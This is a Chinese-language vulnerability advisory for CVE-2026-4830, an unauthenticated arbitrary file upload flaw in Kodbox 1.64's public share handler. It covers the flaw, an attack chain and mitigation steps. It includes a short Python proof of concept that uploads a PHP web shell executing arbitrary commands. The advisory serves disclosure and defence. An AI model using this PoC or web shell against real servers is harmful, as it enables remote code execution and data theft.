CVE-2026-4830 CVSS 5.6 中危

CVE-2026-4830 Kodbox任意文件上传漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4830

漏洞类型

任意文件上传

CVSS评分

5.6 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

kalcaddle kodbox

漏洞概述

Kalcaddle Kodbox 1.64版本被发现存在一个安全漏洞，该漏洞位于组件Public Share Handler的`app/controller/explorer/userShare.class.php`文件中的`Add`函数。由于对上传文件的处理逻辑存在缺陷，导致未经身份验证的远程攻击者可以利用此漏洞执行不受限制的文件上传操作。尽管攻击利用被评估为高复杂度，但鉴于利用代码已公开，该漏洞对系统的机密性、完整性和可用性构成潜在威胁。

技术细节

该漏洞的核心在于Kodbox处理公共共享文件上传请求时，未能正确验证用户提交的数据。具体而言，在`userShare.class.php`文件的`Add`函数中，程序未对上传文件的类型、扩展名或内容进行严格的过滤和校验。攻击者无需经过身份验证（PR:N）且无需用户交互（UI:N），即可向受影响端点发送特制的HTTP POST请求。由于攻击复杂度较高（AC:H），可能需要绕过某些前端限制或特定的请求构造，但成功利用后，攻击者可将恶意脚本（如WebShell）上传至服务器Web目录，进而导致远程代码执行、敏感数据泄露或服务被破坏。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统运行的是Kodbox 1.64版本，并确定Public Share Handler功能开启。

STEP 2

漏洞利用

攻击者构造包含恶意PHP文件的HTTP POST请求，发送至`explorer/userShare/add`接口，绕过身份验证。

STEP 3

文件上传

由于`Add`函数未进行充分校验，恶意文件被成功保存到服务器Web目录下的可访问路径中。

STEP 4

执行攻击

攻击者通过浏览器访问上传的恶意文件URL，执行系统命令，获取服务器权限或窃取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: Kodbox 1.64 Unrestricted File Upload PoC
# Date: 2026-03-26
# Vulnerability: CVE-2026-4830

url = "http://target-url/index.php"
payload = {'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')}

# Target the vulnerable endpoint mentioned in userShare.class.php
# Note: Actual endpoint path may vary based on application routing
target_endpoint = url + "?explorer/userShare/add"

try:
    response = requests.post(target_endpoint, files=payload)
    if response.status_code == 200:
        print("[+] File uploaded successfully!")
        print("[+] Check the upload path to execute the shell.")
    else:
        print("[-] Upload failed. Status code:", response.status_code)
except Exception as e:
    print("[-] Error:", str(e))

影响范围

kalcaddle kodbox 1.64

防御指南

临时缓解措施

建议立即检查并升级受影响的Kodbox系统。在未升级前，应临时禁用“公共共享”功能，并在Web服务器配置层面，禁止在上传目录（如/data/）中执行任何脚本文件，以降低被攻击的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4830
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4830
3 Details https://www.cvedetails.com/cve/CVE-2026-4830/
4 VulDB https://vuldb.com/cve/CVE-2026-4830
5 Link https://vuldb.com/?ctiid.353127
6 Link https://vuldb.com/?id.353127
7 Link https://vuldb.com/?submit.775479
8 Link https://vulnplus-note.wetolink.com/share/7oB22Zhc6u5X

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表